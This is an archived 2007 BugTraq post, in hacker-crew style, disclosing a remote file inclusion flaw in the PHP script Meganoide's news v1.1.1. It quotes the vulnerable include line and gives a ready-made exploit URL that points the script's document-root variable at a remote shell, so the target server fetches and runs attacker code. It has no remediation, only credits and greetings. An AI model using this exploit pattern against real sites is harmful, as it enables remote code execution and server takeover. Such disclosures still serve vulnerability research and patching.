BugTraq
Meganoide's news v1.1.1 < = RFi Vulnerabilities Feb 16 2007 10:42AM
k4rtal gmail com
##################################################################
#Meganoide's news v1.1.1 < = RFi Vulnerabilities
#
#Download : http://www.spacemarc.it/scriptphp/index.php?script=meganoidesnews111
#
#Script Name : Meganoide's news v1.1.1
#
#
##################################################################
#
#Coded By : KaRTaL
#
#
#Contact : k4rtal[at]gmail[dot]com
#
#
##################################################################
#
#V.Code in : [path]/include.php
#
#
# include("$_SERVER[DOCUMENT_ROOT]/news/config.inc.php");
#
#
#Exploit : www.target.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]
#
#
##################################################################
#
#
#Gretz : TiT , Doublekickx , str0ke , DermanTukr , M3rhametsiz , CaCa , Gurkan142 , www.istikla-team.org
#
#
#
#
##################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus